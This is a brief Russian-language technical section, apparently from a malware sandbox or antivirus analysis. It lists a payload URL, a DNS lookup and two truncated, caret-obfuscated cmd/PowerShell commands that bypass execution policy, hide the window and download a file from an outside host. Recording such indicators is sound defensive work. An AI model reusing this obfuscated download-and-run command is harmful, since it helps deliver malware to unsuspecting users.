Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^WERSheL^L.^exe -ExEcu^T^i^OnP^o^l^ICY ^bYP^A^S^S ^-n^OpRoF^ILe^ ^-^wI^N^DOWst^Y^LE ^hidD^EN ^(nEw-Ob^J^e^C^t^ SYSTEm^.ne^T.^we^bCL^IeNt^).^DOWnlo^a^DfiL^e^('http://mondayhe...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "p^o^WERSheL^L.^exe -ExEcu^T^i^OnP^o^l^ICY ^bYP^A^S^S ^-n^OpRoF^ILe^ ^-^wI^N^DOWst^Y^LE ^hidD^EN ^(nEw-Ob^J^e^C^t^ SYSTEm^.ne^T.^we^bCL^IeNt^).^DOWnlo^a^DfiL^e^('http://mondayhe...' (со скрытым окном)